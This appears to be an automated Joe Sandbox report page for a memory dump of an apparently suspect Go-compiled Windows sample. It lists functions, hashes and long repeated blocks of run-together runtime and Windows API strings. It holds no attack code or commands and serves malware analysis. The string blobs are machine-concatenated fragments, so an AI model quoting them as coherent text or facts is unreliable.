Memory Dump Source

Source File: 00000000.00000002.2989639575.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true

Associated: 00000000.00000002.2989610306.0000000000A60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2989711751.0000000000B2A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2989711751.0000000000B7D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2989817396.0000000000BFF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2989841063.0000000000C03000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2989863475.0000000000C05000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2989889167.0000000000C06000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2989918748.0000000000C12000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2989942193.0000000000C13000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2989964334.0000000000C16000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2989964334.0000000000C19000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2989964334.0000000000C40000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2989964334.0000000000C46000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2989964334.0000000000C6E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2990085162.0000000000C73000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2990106458.0000000000C74000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2990106458.0000000000C79000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a60000_SecuriteInfo.jbxd

Similarity

API ID:
String ID: bad sweepgen in refillcall not at safe pointcannot allocate memorycompileCallabck: type duplicated defer entryfreeIndex is not validgetenv before env initheadTailIndex overflowinteger divide by zerointerface conversion: kernel32.dll not foundminpc or maxpc inv$out of memoryprofMemActiveprofMemFutureruntime: seq=runtime: val=srmount errortimeEndPeriodtimer expiredtraceStackTabvalue method xadd64 failedxchg64 failed}sched={pc: needspinning= nmidlelocked= on zero Value out of range procedure in to finalizer untype$refill of span with free space remainingruntime.SetFinalizer: first argument is runtime.preemptM: duplicatehandle failedruntime: SyscallN has too many argumentsruntime: out of memory: cannot allocate runtime: typeBitsBulkBarrier with type ryuFtoaFixed32 calle$span has no free spacestack not a power of 2trace reader (blocked)trace: alloc too largeunexpected method stepwirep: invalid p state) must be a power of 223283064365386962890625<invalid reflect.Value>Argentina Standard TimeAstrakhan Standard TimeCertGetCertif
API String ID: 0-3381272448
Opcode ID: 3df6d773e9a3cc595a8b1766713e1afc1053e576276cbd404880794fed1a1c15
Instruction ID: 4863232a0b5259ff7fe499756da20326ef67be714f8261e8cb77c9be9092554b
Opcode Fuzzy Hash: 3df6d773e9a3cc595a8b1766713e1afc1053e576276cbd404880794fed1a1c15
Instruction Fuzzy Hash: A951BC72204BA4C6DB10DF14E88039EB7A5F789B84F958222EB8D07B69DF3CC945C750

Function 00AAF540 Relevance: 5.1, Strings: 4, Instructions: 122COMMON

Download Yara Rule

Strings

runtime: textAddr segmentation faultserver misbehavingstopping the worldstreams pipe errorsync.RWMutex.RLocksystem page size (tracebackancestorsuse of closed filevalue out of range [controller reset] called using nil *, g->atomicstatus=, gp->atomicstatus=1490, xrefs: 00AAF5DF
- < > m= n=%: +00+01+03+04+05+06+07+08+09+10+11+12+13+14-01-02-03-04-05-06-08-09-11-12...125625:\/???ADTASTBSTCATCDTCETCSTDltEATEDTEETEOFESTGMTHDTHSTHanIDTISTJSTKSTLaoMDTMSKMSTMayMroNDTNSTNULNaNNkoPC=PDTPKTPSTStdUTCVaiWAT\\?]:adxaesavxb64cgodnsendfinfmaft, xrefs: 00AAF615
out of range procedure in to finalizer untyped args -thread limit1907348632812595367431640625CertCloseStoreClearCommBreakClearCommErrorCoInitializeExCoUninitializeControlServiceCreateEventExWCreateMutexExWCreateProcessWCreateServiceWCryptGenRandomFindFirs, xrefs: 00AAF5FA
runtime: text offset out of rangeruntime: type offset out of rangeskip everything and stop the walkslice bounds out of range [%x:%y]stackalloc not on scheduler stackstoplockedm: inconsistent lockingtimer period must be non-negativetoo many Answers to pack (>65, xrefs: 00AAF63A

Memory Dump Source

Source File: 00000000.00000002.2989639575.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true

Associated: 00000000.00000002.2989610306.0000000000A60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2989711751.0000000000B2A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2989711751.0000000000B7D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2989817396.0000000000BFF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2989841063.0000000000C03000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2989863475.0000000000C05000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2989889167.0000000000C06000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2989918748.0000000000C12000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2989942193.0000000000C13000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2989964334.0000000000C16000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2989964334.0000000000C19000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2989964334.0000000000C40000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2989964334.0000000000C46000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2989964334.0000000000C6E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2990085162.0000000000C73000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2990106458.0000000000C74000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2990106458.0000000000C79000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a60000_SecuriteInfo.jbxd

Similarity

API ID:
String ID: - < > m= n=%: +00+01+03+04+05+06+07+08+09+10+11+12+13+14-01-02-03-04-05-06-08-09-11-12...125625:\/???ADTASTBSTCATCDTCETCSTDltEATEDTEETEOFESTGMTHDTHSTHanIDTISTJSTKSTLaoMDTMSKMSTMayMroNDTNSTNULNaNNkoPC=PDTPKTPSTStdUTCVaiWAT\\?]:adxaesavxb64cgodnsendfinfmaft$ out of range procedure in to finalizer untyped args -thread limit1907348632812595367431640625CertCloseStoreClearCommBreakClearCommErrorCoInitializeExCoUninitializeControlServiceCreateEventExWCreateMutexExWCreateProcessWCreateServiceWCryptGenRandomFindFirs$runtime: text offset out of rangeruntime: type offset out of rangeskip everything and stop the walkslice bounds out of range [%x:%y]stackalloc not on scheduler stackstoplockedm: inconsistent lockingtimer period must be non-negativetoo many Answers to pack (>65$runtime: textAddr segmentation faultserver misbehavingstopping the worldstreams pipe errorsync.RWMutex.RLocksystem page size (tracebackancestorsuse of closed filevalue out of range [controller reset] called using nil *, g->atomicstatus=, gp->atomicstatus=1490
API String ID: 0-923084507
Opcode ID: 90e719671723263886c2ba709dd312d4ec10edd71b8b2bb2fe77b40ae9a7b248
Instruction ID: 4cb410bb6e728feffd9f3f8ce6227ba5395ceb051c8e10a951169f362d36825e
Opcode Fuzzy Hash: 90e719671723263886c2ba709dd312d4ec10edd71b8b2bb2fe77b40ae9a7b248
Instruction Fuzzy Hash: E941BF76B15F80D9CA28EF95E5803ADB3A0F749B80F884932EA5C07B65DF38C952C740

Function 00AABB00 Relevance: 5.1, Strings: 4, Instructions: 105COMMON

Download Yara Rule

Strings

shrinking stack in libcallstartlockedm: locked to meunknown ABI parameter kinduse of invalid sweepLockerwakep: negative nmspinning not in stack roots range [363797880709171295166015625: unexpected return pc for CertEnumCertificatesInStoreEaster Island Standard, xrefs: 00AABC52
bad status in shrinkstackbad system huge page sizechansend: spurious wakeupcheckdead: no m for timercheckdead: no p for timerinconsistent poll.fdMutexinvalid cross-device linkinvalid network interfacemissing stack in newstackmissing traceGCSweepStartno answer , xrefs: 00AABC76
shrinkstack at bad timespan has no free stacksstack growth after forksyntax error in patternsystem huge page size (too many pointers (>10)work.nwait > work.nproc116415321826934814453125582076609134674072265625AllocateAndInitializeSidAssignProcessToJobObjectAze, xrefs: 00AABC65
missing stack in shrinkstackmspan.sweep: m is not lockednewproc1: new g is not Gdeadnewproc1: newg missing stackos: process already finishedprotocol driver not attachedregion exceeds uintptr rangeruntime.semasleep unexpectedruntime: bad lfnode address runtime:, xrefs: 00AABC87

Memory Dump Source

Source File: 00000000.00000002.2989639575.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true

Associated: 00000000.00000002.2989610306.0000000000A60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2989711751.0000000000B2A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2989711751.0000000000B7D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2989817396.0000000000BFF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2989841063.0000000000C03000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2989863475.0000000000C05000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2989889167.0000000000C06000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2989918748.0000000000C12000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2989942193.0000000000C13000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2989964334.0000000000C16000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2989964334.0000000000C19000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2989964334.0000000000C40000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2989964334.0000000000C46000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2989964334.0000000000C6E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2990085162.0000000000C73000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2990106458.0000000000C74000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2990106458.0000000000C79000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a60000_SecuriteInfo.jbxd

Similarity

API ID:
String ID: bad status in shrinkstackbad system huge page sizechansend: spurious wakeupcheckdead: no m for timercheckdead: no p for timerinconsistent poll.fdMutexinvalid cross-device linkinvalid network interfacemissing stack in newstackmissing traceGCSweepStartno answer $missing stack in shrinkstackmspan.sweep: m is not lockednewproc1: new g is not Gdeadnewproc1: newg missing stackos: process already finishedprotocol driver not attachedregion exceeds uintptr rangeruntime.semasleep unexpectedruntime: bad lfnode address runtime:$shrinking stack in libcallstartlockedm: locked to meunknown ABI parameter kinduse of invalid sweepLockerwakep: negative nmspinning not in stack roots range [363797880709171295166015625: unexpected return pc for CertEnumCertificatesInStoreEaster Island Standard$shrinkstack at bad timespan has no free stacksstack growth after forksyntax error in patternsystem huge page size (too many pointers (>10)work.nwait > work.nproc116415321826934814453125582076609134674072265625AllocateAndInitializeSidAssignProcessToJobObjectAze
API String ID: 0-304115802
Opcode ID: 6f1778721740704655e9bbb5f091cb630e257eb822cfda28d4069c1e7e3f7e49
Instruction ID: e9efeb825a5eb689b3d07945bb3ff195e55a00cd0174a39415829a65faa05e63
Opcode Fuzzy Hash: 6f1778721740704655e9bbb5f091cb630e257eb822cfda28d4069c1e7e3f7e49
Instruction Fuzzy Hash: 3D41AD72725A84CAEF14EB25D4457A9B7A0F78AB80F888475DB4D077A7DF38C444C720

Function 00A7ADA0 Relevance: 5.1, Strings: 4, Instructions: 99COMMON

Download Yara Rule

Strings

limiterEvent.stop: invalid limiter event type foundpotentially overlapping in-use allocations detectedruntime: netpoll: PostQueuedCompletionStatus failed726e6e6a2035352e2e34282a2d34282f2a34282f2b356a75696eConvertSecurityDescriptorToStringSecurityDescriptorWCon, xrefs: 00A7AE8B
limiterEvent.stop: found wrong event in p's limiter event slotreflect: reflect.Value.Pointer on an invalid notinheap pointerruntime: internal error: misuse of lockOSThread/unlockOSThreadmalformed GOMEMLIMIT; see `go doc runtime/debug.SetMemoryLimit`ABCDEFGHIJK, xrefs: 00A7AEEF
runtime: want=s.allocCount= semaRoot queuestack overflowstopm spinningstore64 failedsync.Cond.Waittext file busytoo many linkstoo many usersunexpected EOFunknown methodunreachable: unsafe.PointeruserArenaStatewinapi error #work.full != 0 with GC prog,M3.2.0, xrefs: 00A7AEAA
got= max= ms, ptr tab= top=+0330+0430+0530+0545+0630+0845+1030+1245+1345, fp:-09301562578125<nil>AdlamAprilBamumBatakBuhidDograErrorGreekKhmerLatinLimbuLocalLstatMarchNushuOghamOriyaOsageRunicSTermTakriTamilTypeA] = (arraychdirclosedeferfalsefaultfilesgcing, xrefs: 00A7AEC8

Memory Dump Source

Source File: 00000000.00000002.2989639575.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true

Associated: 00000000.00000002.2989610306.0000000000A60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2989711751.0000000000B2A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2989711751.0000000000B7D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2989817396.0000000000BFF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2989841063.0000000000C03000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2989863475.0000000000C05000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2989889167.0000000000C06000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2989918748.0000000000C12000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2989942193.0000000000C13000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2989964334.0000000000C16000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2989964334.0000000000C19000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2989964334.0000000000C40000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2989964334.0000000000C46000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2989964334.0000000000C6E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2990085162.0000000000C73000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2990106458.0000000000C74000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2990106458.0000000000C79000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a60000_SecuriteInfo.jbxd

Similarity

API ID:
String ID: got= max= ms, ptr tab= top=+0330+0430+0530+0545+0630+0845+1030+1245+1345, fp:-09301562578125<nil>AdlamAprilBamumBatakBuhidDograErrorGreekKhmerLatinLimbuLocalLstatMarchNushuOghamOriyaOsageRunicSTermTakriTamilTypeA] = (arraychdirclosedeferfalsefaultfilesgcing$limiterEvent.stop: found wrong event in p's limiter event slotreflect: reflect.Value.Pointer on an invalid notinheap pointerruntime: internal error: misuse of lockOSThread/unlockOSThreadmalformed GOMEMLIMIT; see `go doc runtime/debug.SetMemoryLimit`ABCDEFGHIJK$limiterEvent.stop: invalid limiter event type foundpotentially overlapping in-use allocations detectedruntime: netpoll: PostQueuedCompletionStatus failed726e6e6a2035352e2e34282a2d34282f2a34282f2b356a75696eConvertSecurityDescriptorToStringSecurityDescriptorWCon$runtime: want=s.allocCount= semaRoot queuestack overflowstopm spinningstore64 failedsync.Cond.Waittext file busytoo many linkstoo many usersunexpected EOFunknown methodunreachable: unsafe.PointeruserArenaStatewinapi error #work.full != 0 with GC prog,M3.2.0
API String ID: 0-824608216
Opcode ID: c739ee8a58b780bf04abc761d7c68050a9e827702cb99b8b7cdf0e4b010c52ce
Instruction ID: ed8a64c75c7a55df665583caf92df29c2b6d94d8b5d5d1ba81dfe63abff95670
Opcode Fuzzy Hash: c739ee8a58b780bf04abc761d7c68050a9e827702cb99b8b7cdf0e4b010c52ce
Instruction Fuzzy Hash: 19316862756B54AAFF10DB21EC4036E7765E7D47C0F88C522EA5C03B66CB2CC944CB52

Function 00AB8D60 Relevance: 5.1, Strings: 4, Instructions: 98COMMON

Download Yara Rule

Strings

} stack=[ MB goal, flushGen gfreecnt= heapGoal= pages at ptrSize= runqsize= runqueue= s.base()= spinning= stopwait= sweepgen sweepgen= targetpc= throwing= until pc=%!Weekday(, bound = , limit = /dev/stdin12207031256103515625AdditionalBad varintCancelIoExC, xrefs: 00AB8E0F
), ->.\0s25: > CcCfCoCsLlLmLoLtLuMcMeMnNdNlNoPcPdPePfPiPoPsScSkSmSoYiZlZpZs")" ][]i)msn=nss us|0|1} G M P ) *( - < > m= n=%: +00+01+03+04+05+06+07+08+09+10+11+12+13+14-01-02-03-04-05-06-08-09-11-12...125625:\/???ADTASTBSTCATCDTCETCSTDltEATEDTEETE, xrefs: 00AB8E4F
, fp:-09301562578125<nil>AdlamAprilBamumBatakBuhidDograErrorGreekKhmerLatinLimbuLocalLstatMarchNushuOghamOriyaOsageRunicSTermTakriTamilTypeA] = (arraychdirclosedeferfalsefaultfilesgcinggscanhchanhttpsimap2imap3imapsinit int16int32int64mheapntohspanicpop3sscav , xrefs: 00AB8DF3
stack: frame={sp:swept cached spansync.RWMutex.Lockthread exhaustionunknown caller pcunknown type kindwait for GC cyclewrong medium type but memory size because dotdotdot in async preempt to non-Go memory , locked to thread298023223876953125Arab Standard Ti, xrefs: 00AB8DD8

Memory Dump Source

Source File: 00000000.00000002.2989639575.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true

Associated: 00000000.00000002.2989610306.0000000000A60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2989711751.0000000000B2A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2989711751.0000000000B7D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2989817396.0000000000BFF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2989841063.0000000000C03000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2989863475.0000000000C05000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2989889167.0000000000C06000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2989918748.0000000000C12000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2989942193.0000000000C13000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2989964334.0000000000C16000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2989964334.0000000000C19000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2989964334.0000000000C40000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2989964334.0000000000C46000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2989964334.0000000000C6E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2990085162.0000000000C73000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2990106458.0000000000C74000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2990106458.0000000000C79000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a60000_SecuriteInfo.jbxd

Similarity

API ID:
String ID: ), ->.\0s25: > CcCfCoCsLlLmLoLtLuMcMeMnNdNlNoPcPdPePfPiPoPsScSkSmSoYiZlZpZs")" ][]i)msn=nss us|0|1} G M P ) *( - < > m= n=%: +00+01+03+04+05+06+07+08+09+10+11+12+13+14-01-02-03-04-05-06-08-09-11-12...125625:\/???ADTASTBSTCATCDTCETCSTDltEATEDTEETE$, fp:-09301562578125<nil>AdlamAprilBamumBatakBuhidDograErrorGreekKhmerLatinLimbuLocalLstatMarchNushuOghamOriyaOsageRunicSTermTakriTamilTypeA] = (arraychdirclosedeferfalsefaultfilesgcinggscanhchanhttpsimap2imap3imapsinit int16int32int64mheapntohspanicpop3sscav $stack: frame={sp:swept cached spansync.RWMutex.Lockthread exhaustionunknown caller pcunknown type kindwait for GC cyclewrong medium type but memory size because dotdotdot in async preempt to non-Go memory , locked to thread298023223876953125Arab Standard Ti$} stack=[ MB goal, flushGen gfreecnt= heapGoal= pages at ptrSize= runqsize= runqueue= s.base()= spinning= stopwait= sweepgen sweepgen= targetpc= throwing= until pc=%!Weekday(, bound = , limit = /dev/stdin12207031256103515625AdditionalBad varintCancelIoExC
API String ID: 0-635746367
Opcode ID: dd2ee256eff62fd0381feeea3975628012d497d26e11a575df5d61520e92d8fb
Instruction ID: 191a6623987aa9a87c07cf1453b101cf3240776f11b522861888a15637662436
Opcode Fuzzy Hash: dd2ee256eff62fd0381feeea3975628012d497d26e11a575df5d61520e92d8fb
Instruction Fuzzy Hash: 5E410C72328B8085DA60DB15F9803AEB7A8F798B80F445526FACD47B6ADF3CC5558B10

Function 00A91AA0 Relevance: 5.1, Strings: 4, Instructions: 70COMMON

Download Yara Rule

Strings

), ->.\0s25: > CcCfCoCsLlLmLoLtLuMcMeMnNdNlNoPcPdPePfPiPoPsScSkSmSoYiZlZpZs")" ][]i)msn=nss us|0|1} G M P ) *( - < > m= n=%: +00+01+03+04+05+06+07+08+09+10+11+12+13+14-01-02-03-04-05-06-08-09-11-12...125625:\/???ADTASTBSTCATCDTCETCSTDltEATEDTEETE, xrefs: 00A91BA6
runtime: failed to create new OS thread (have runtime: name offset base pointer out of rangeruntime: panic before malloc heap initializedruntime: text offset base pointer out of rangeruntime: type offset base pointer out of rangesignal arrived during external, xrefs: 00A91B6D
already; errno= mheap.sweepgen= not in ranges: untyped locals , not a function0123456789ABCDEF0123456789abcdef2384185791015625ConnectNamedPipeCreateDirectoryWCreateJobObjectWCreateNamedPipeWCryptProtectDataCryptQueryObjectDefineDosDeviceWDnsNameCompare_WDupl, xrefs: 00A91B8B
runtime.newosprocruntime/internal/runtime: level = runtime: nameOff runtime: pointer runtime: summary[runtime: textOff runtime: typeOff scanobject n == 0select (no cases)stack: frame={sp:swept cached spansync.RWMutex.Lockthread exhaustionunknown caller pcunkno, xrefs: 00A91BBC

Memory Dump Source

Source File: 00000000.00000002.2989639575.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true

Associated: 00000000.00000002.2989610306.0000000000A60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2989711751.0000000000B2A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2989711751.0000000000B7D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2989817396.0000000000BFF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2989841063.0000000000C03000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2989863475.0000000000C05000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2989889167.0000000000C06000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2989918748.0000000000C12000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2989942193.0000000000C13000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2989964334.0000000000C16000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2989964334.0000000000C19000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2989964334.0000000000C40000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2989964334.0000000000C46000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2989964334.0000000000C6E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2990085162.0000000000C73000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2990106458.0000000000C74000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2990106458.0000000000C79000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a60000_SecuriteInfo.jbxd

Similarity

API ID:
String ID: already; errno= mheap.sweepgen= not in ranges: untyped locals , not a function0123456789ABCDEF0123456789abcdef2384185791015625ConnectNamedPipeCreateDirectoryWCreateJobObjectWCreateNamedPipeWCryptProtectDataCryptQueryObjectDefineDosDeviceWDnsNameCompare_WDupl$), ->.\0s25: > CcCfCoCsLlLmLoLtLuMcMeMnNdNlNoPcPdPePfPiPoPsScSkSmSoYiZlZpZs")" ][]i)msn=nss us|0|1} G M P ) *( - < > m= n=%: +00+01+03+04+05+06+07+08+09+10+11+12+13+14-01-02-03-04-05-06-08-09-11-12...125625:\/???ADTASTBSTCATCDTCETCSTDltEATEDTEETE$runtime.newosprocruntime/internal/runtime: level = runtime: nameOff runtime: pointer runtime: summary[runtime: textOff runtime: typeOff scanobject n == 0select (no cases)stack: frame={sp:swept cached spansync.RWMutex.Lockthread exhaustionunknown caller pcunkno$runtime: failed to create new OS thread (have runtime: name offset base pointer out of rangeruntime: panic before malloc heap initializedruntime: text offset base pointer out of rangeruntime: type offset base pointer out of rangesignal arrived during external
API String ID: 0-2566142914
Opcode ID: 12d6b0f091a9752e122a6117dc43e1d463aa28ed7e5821e2cae71f56dc1f57e8
Instruction ID: 6d4c52226cb56a3f56a9a2edb98ed7c68dcacf5a3947334561a6ba3428c802af
Opcode Fuzzy Hash: 12d6b0f091a9752e122a6117dc43e1d463aa28ed7e5821e2cae71f56dc1f57e8
Instruction Fuzzy Hash: 4E31383A714B8991EE10EB61E98236E77A4F74AB80F448226EE8C43726EF39C540C710

Function 00AA1EC0 Relevance: 5.1, Strings: 4, Instructions: 68COMMON

Download Yara Rule

Strings

releasep: m=runtime: gp=runtime: sp=self-preemptsetupapi.dllshort bufferspanSetSpinesweepWaiterstraceStringswintrust.dllwirep: p->m=worker mode wtsapi32.dll != sweepgen MB globals, MB) workers= called from flushedWork idlethreads= is nil, not nStackRoots=, xrefs: 00AA1F5D
releasep: invalid argruntime: confused by runtime: newstack at runtime: newstack sp=runtime: searchIdx = runtime: work.nwait= stale NFS file handlestartlockedm: m has pstartm: m is spinningstate not recoverabletimer data corruptiontrace/breakpoint trapunexpect, xrefs: 00AA1FEA
p->status= s.nelems= schedtick= span.list= timerslen=) at entry+, elemsize=, npages = /dev/stderr/dev/stdout30517578125: frame.sp=ClassHESIODCloseHandleCoGetObjectCreateFileWDeleteFileWDives_AkuruEnumWindowsExitProcessFreeLibraryGOMEMLIMIT=GOTRACEBACKGetFile, xrefs: 00AA1FAF
m->p= max= min= next= p->m= prev= span=% util(...), i = , not 390625<-chanAnswerArabicAugustBrahmiCarianChakmaCommonCopticFormatFridayGetACPGetAceGothicHangulHatranHebrewHyphenKaithiKhojkiLepchaLycianLydianMondayRejangSCHED StringSundaySyriacTai_LeTangutTe, xrefs: 00AA1F78

Memory Dump Source

Source File: 00000000.00000002.2989639575.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true

Associated: 00000000.00000002.2989610306.0000000000A60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2989711751.0000000000B2A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2989711751.0000000000B7D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2989817396.0000000000BFF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2989841063.0000000000C03000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2989863475.0000000000C05000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2989889167.0000000000C06000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2989918748.0000000000C12000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2989942193.0000000000C13000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2989964334.0000000000C16000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2989964334.0000000000C19000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2989964334.0000000000C40000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2989964334.0000000000C46000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2989964334.0000000000C6E000.00000004.00000001.01000000.00000003.sdmpDownload File
